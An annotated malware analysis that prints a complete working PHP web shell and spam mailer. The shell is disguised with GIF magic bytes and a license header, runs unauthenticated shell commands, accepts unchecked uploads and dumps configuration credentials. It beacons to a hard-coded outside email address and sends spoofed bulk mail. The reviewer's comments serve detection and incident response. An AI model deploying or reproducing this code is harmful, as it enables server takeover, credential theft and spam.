- GIF892MPEG<?php
- /**
- --------------------------------------------------------------------
- The PHP License, version 3.0
- Copyright (c) 1999 - 2006 The PHP Group. All rights reserved.
- Redistribution and use in source and binary forms, with or without
- modification, is permitted provided that the following conditions
- are met:
- 1. Redistributions of source code must retain the above copyright
- notice, this list of conditions and the following disclaimer.
- 2. Redistributions in binary form must reproduce the above copyright
- notice, this list of conditions and the following disclaimer in
- the documentation and/or other materials provided with the
- distribution.
- 3. The name "PHP" must not be used to endorse or promote products
- derived from this software without prior written permission. For
- written permission, please contact group@php.net.
- 4. Products derived from this software may not be called "PHP", nor
- may "PHP" appear in their name, without prior written permission
- from group@php.net. You may indicate that your software works in
- conjunction with PHP by saying "Foo for PHP" instead of calling
- it "PHP Foo" or "phpfoo"
- 5. The PHP Group may publish revised and/or new versions of the
- license from time to time. Each version will be given a
- distinguishing version number.
- Once covered code has been published under a particular version
- of the license, you may always continue to use it under the terms
- of that version. You may also choose to use such covered code
- under the terms of any subsequent version of the license
- published by the PHP Group. No one other than the PHP Group has
- the right to modify the terms applicable to covered code created
- under this License.
- 6. Redistributions of any form whatsoever must retain the following
- acknowledgment:
- "This product includes PHP, freely available from
- <http://www.php.net/>".
- --------------------------------------------------------------------
- THIS SOFTWARE IS PROVIDED BY THE PHP DEVELOPMENT TEAM ``AS IS'' AND
- ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
- THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
- PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE PHP
- DEVELOPMENT TEAM OR ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
- INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
- (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
- SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- OF THE POSSIBILITY OF SUCH DAMAGE.
- */
// NOTE(review): this listing is a PHP web shell with a bulk mailer attached. It
// opens with the bytes "GIF892MPEG" directly in front of the PHP open tag and a
// copied PHP License header; presumably both are there to survive casual
// inspection or naive image checks on upload. A file matching it on a server
// is evidence of compromise, not application code.
//
// All PHP error reporting is switched off for the rest of the request.
- error_reporting(0);
// First-request beacon: when the session key is unset, the Host header, request
// URI, safe_mode setting and the server/client addresses are mailed to a
// hard-coded recipient. No session_start() appears in this listing, so the key
// may never persist and the beacon may fire on every request (confirm).
// The Indonesian strings read roughly "someone injected" / "hijack result".
// Detection: mail sent by the web server account to that recipient, with the
// site host and request URI in the subject line.
- if (!isset($_SESSION['bajak'])) {
- $visitcount = 0; // never read anywhere in this listing
- $web = $_SERVER["HTTP_HOST"];
- $inj = $_SERVER["REQUEST_URI"];
- $body = "ada yang inject \n$web$inj";
- $safem0de = @ini_get('safe_mode');
- if (!$safem0de) {$security= "SAFE_MODE = OFF";}
- else {$security= "SAFE_MODE = ON";};
- $serper=gethostbyname($_SERVER['SERVER_ADDR']);
- $injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
- mail("mihawkstore@yahoo.com", "$body","Hasil Bajakan http://$web$inj\n$security\nIP Server = $serper\n IP Injector= $injektor");
- $_SESSION['bajak'] = 0;
- }
- else {$_SESSION['bajak']++;};
// Self-relocation: a request carrying a "clone" query parameter renames the
// running script to images/stories/food/footer.php under the document root.
// The path looks like a Joomla media folder (assumption). Mitigation: deny PHP
// execution in media/upload directories and review any .php file found there.
- if(isset($_GET['clone'])){
- $source = $_SERVER['SCRIPT_FILENAME'];
- $desti =$_SERVER['DOCUMENT_ROOT']."/images/stories/food/footer.php";
- rename($source, $desti);
- }
// Banner: prints the safe_mode state, the uid/gid and owner name of the script
// and the full uname string to whoever requests the page. safe_mode was removed
// in PHP 5.4, so on current PHP ini_get() returns false and this reports OFF.
// The fixed <title> text is a usable signature for response-body or file scans.
- $safem0de = @ini_get('safe_mode');
- if (!$safem0de) {$security= "SAFE_MODE : OFF";}
- else {$security= "SAFE_MODE : ON";}
- echo "<title>elv1n4</title><br>";
- echo "<font size=2 color=#888888><b>".$security."</b><br>";
- $cur_user="(".get_current_user().")";
- echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
- echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
// Returns the current working directory with a trailing path separator.
// The last "/" is looked for first, then the last "\". If the separator found
// is not already the final character, it is appended; otherwise the directory
// is returned unchanged. Because the strrpos() result is used as a truth
// value, a match at position 0 counts as "not found"; when neither branch is
// taken the function ends without a return statement and yields null.
// The upload handler later in this file uses the result as its target directory.
- function pwd() {
- $cwd = getcwd();
- if($u=strrpos($cwd,'/')){
- if($u!=strlen($cwd)-1){
- return $cwd.'/';}
- else{return $cwd;};
- }
- elseif($u=strrpos($cwd,'\\')){
- if($u!=strlen($cwd)-1){
- return $cwd.'\\';}
- else{return $cwd;};
- };
- }
// Operator interface: a command form and an upload form. No authentication or
// access check appears anywhere in this listing, so every capability below is
// open to anyone who can reach the URL.
- echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
- echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
// Upload handler: stores the posted file in the script's working directory
// under a client-supplied name, with no check on extension, type or path.
// move_uploaded_file() is called twice and the message branches are keyed on
// the second call, so the text in the response does not reliably show whether a
// file was written. During response, compare the directory contents and
// timestamps instead of relying on captured responses.
- if(isset($_POST['submit'])){
- $uploaddir = pwd();
- if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
- move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
- if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
- echo "Upload Failed";
- } else { echo "Upload Success to ".$uploaddir.$name." :D "; }
- }
// Command execution: the "cmd" value from POST or from the query string is
// handed unmodified to shell_exec() and the output is echoed, so commands run
// with the privileges of the PHP process.
// Detection: access-log entries with a "cmd" parameter on this path, and shell
// processes spawned by the web server or PHP worker.
// Mitigation: list shell_exec and related functions in disable_functions where
// the application does not need them.
- if(isset($_POST['command'])){
- $cmd = $_POST['cmd'];
- echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
- }
- elseif(isset($_GET['cmd'])){
- $comd = $_GET['cmd'];
- echo "<pre><font size=3 color=#000000>".shell_exec($comd)."</font></pre>";
- }
// "rf" echoes ../../configuration.php verbatim. The name matches Joomla's
// configuration file (assumption); if so, the database credentials and secrets
// in it should be treated as exposed and rotated.
- elseif(isset($_GET['rf'])){
- $rf = file_get_contents("../../configuration.php");
- echo $rf;
- }
// With no parameters the page still runs a directory listing on every request.
- else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
- }
// Mailer inputs: every field, including the sender identity and recipient
// list, comes straight from the request. The @ prefix hides undefined-index
// notices when a field is absent.
- @$action=$_POST['action'];
- @$from=$_POST['from'];
- @$realname=$_POST['realname'];
- @$replyto=$_POST['replyto'];
- @$subject=$_POST['subject'];
- @$message=$_POST['message'];
- @$emaillist=$_POST['emaillist'];
- @$file_name=$_FILES['file']['name'];
- @$contenttype=$_POST['contenttype'];
- @$file=$_FILES['file']['tmp_name'];
- @$amount=$_POST['amount'];
// The execution time limit is taken from the request; 0 removes the limit.
- set_time_limit(intval($_POST['timelimit']));
// action=mysql: includes a sibling file mysql.info.php (not part of this
// listing) and appends the first column of its query result to the recipient
// list. The mysql_* functions used here were removed in PHP 7.
- If ($action=="mysql"){
- //Grab email addresses from MySQL
- include "./mysql.info.php";
- if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
- print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
- exit;
- }
- $db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed.");
- mysql_select_db($sqldb, $db) or die("Could not select database $sqldb");
- $result = mysql_query($sqlquery) or die("Query Failed: $sqlquery");
- $numrows = mysql_num_rows($result);
- for($x=0; $x<$numrows; $x++){
- $result_row = mysql_fetch_row($result);
- $oneemail = $result_row[0];
- $emaillist .= $oneemail."\n";
- }
- }
// action=send: undoes backslash escaping of quotes in the message and subject.
// ereg_replace() was removed in PHP 7. The HTML form that follows this PHP
// section prints the submitted values back into the page without escaping.
- if ($action=="send"){ $message = urlencode($message);
- $message = ereg_replace("%5C%22", "%22", $message);
- $message = urldecode($message);
- $message = stripslashes($message);
- $subject = stripslashes($subject);
- }
- ?>
- <form name="form1" method="post" action="" enctype="multipart/form-data"><br />
- <table width="142" border="0">
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Email:</font>
- </div>
- </td>
- <td width="219">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="from" value="<?php print $from; ?>" size="30" />
- </font>
- </td>
- <td width="212">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Your Name:</font>
- </div>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="realname" value="<?php print $realname; ?>" size="30" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Reply-To:</font>
- </div>
- </td>
- <td width="219">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="replyto" value="<?php print $replyto; ?>" size="30" />
- </font>
- </td>
- <td width="212">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Attach File:</font>
- </div>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="file" name="file" size="24" />
- </font>
- </td>
- </tr>
- <tr>
- <td width="81">
- <div align="right">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">Subject:</font>
- </div>
- </td>
- <td colspan="3" width="703">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <input type="text" name="subject" value="<? print $subject; ?>" size="90" />
- </font>
- </td>
- </tr>
- <tr valign="top">
- <td colspan="3" width="520">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Message Box :</font>
- </td>
- <td width="278">
- <font face="Verdana, Arial, Helvetica, sans-serif" size="-3">Email Target / Email Send To :</font>
- </td>
- </tr>
- <tr valign="top">
- <td colspan="3" width="520">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="message" cols="56" rows="10"><?php print $message; ?></textarea><br />
- <input type="radio" name="contenttype" value="plain" /> Plain
- <input type="radio" name="contenttype" value="html" checked="checked" /> HTML
- <input type="hidden" name="action" value="send" /><br />
- Number to send: <input type="text" name="amount" value="1" size="10" /><br />
- Maximum script execution time(in seconds, 0 for no timelimit)<input type="text" name="timelimit" value="0" size="10" />
- <input type="submit" value="Send eMails" />
- </font>
- </td>
- <td width="278">
- <font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
- <textarea name="emaillist" cols="32" rows="10"><?php print $emaillist; ?></textarea>
- </font>
- </td>
- </tr>
- </table>
- </form>
- <?php
// Bulk-mail sender. It runs when the form posts action=send and mails every
// address in the submitted list, repeated "amount" times, through the host's
// own mail() transport, so the compromised server becomes the apparent origin
// of the messages.
// Detection: a sudden rise in outbound mail from the web server account, or
// mail-log entries naming this script (PHP's mail.add_x_header and mail.log
// settings record the originating script when enabled).
- if ($action=="send"){
// The check uses &&, so it rejects only a submission where all four fields are empty.
- if (!$from && !$subject && !$message && !$emaillist){
- print "Please complete all fields before sending your message.";
- exit;
- }
// split() was removed in PHP 7.
- $allemails = split("\n", $emaillist);
- $numemails = count($allemails);
// Hard-coded values used by the final mail() call at the end of this block.
- $secure = 'mihawkstore@yahoo.com';
- $filter = "maillist";
- $float = "From : mailist info <full@info.com>";
- $webe = $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
- //Open the file attachment if any, and base64_encode it for email transport
- If ($file_name){
- if (!file_exists($file)){
- die("The file you are trying to upload couldn't be copied to the server");
- }
- $content = fread(fopen($file,"r"),filesize($file));
- $content = chunk_split(base64_encode($content));
- $uid = strtoupper(md5(uniqid(time())));
- $name = basename($file);
- }
- for($xx=0; $xx<$amount; $xx++){
- for($x=0; $x<$numemails; $x++){
- $to = $allemails[$x];
- if ($to){
- $to = ereg_replace(" ", "", $to);
// The "&email&" placeholder is replaced in $message and $subject themselves,
// so the substituted text carries over to later iterations.
- $message = ereg_replace("&email&", $to, $message);
- $subject = ereg_replace("&email&", $to, $subject);
- print "Sending mail to $to.......";
- flush();
// From and Reply-To come from the request, so the sender identity is whatever
// the operator typed. The message text and any attachment are appended to the
// header string, and mail() is called with an empty body argument.
- $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
- $header .= "MIME-Version: 1.0\r\n";
- If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
- If ($file_name) $header .= "--$uid\r\n";
- $header .= "Content-Type: text/$contenttype\r\n";
- $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
- $header .= "$message\r\n";
- If ($file_name) $header .= "--$uid\r\n";
// $file_type is not assigned anywhere in this listing.
- If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
- If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
- If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
- If ($file_name) $header .= "$content\r\n";
- If ($file_name) $header .= "--$uid--";
- mail($to, $subject, "", $header);
- print "ok<br>";
- flush();
- }
- }
- }
// Second beacon: after each run, a message about the sending URL goes to the
// hard-coded recipient. $ip is not defined in this listing, and the recipient
// list is passed in mail()'s additional-headers position, with $float in the
// additional-parameters position.
- mail($secure, $filter, " sender IP : ". $ip . "" . "From URL : " .$webe. "" ,$emaillist, $float);
- }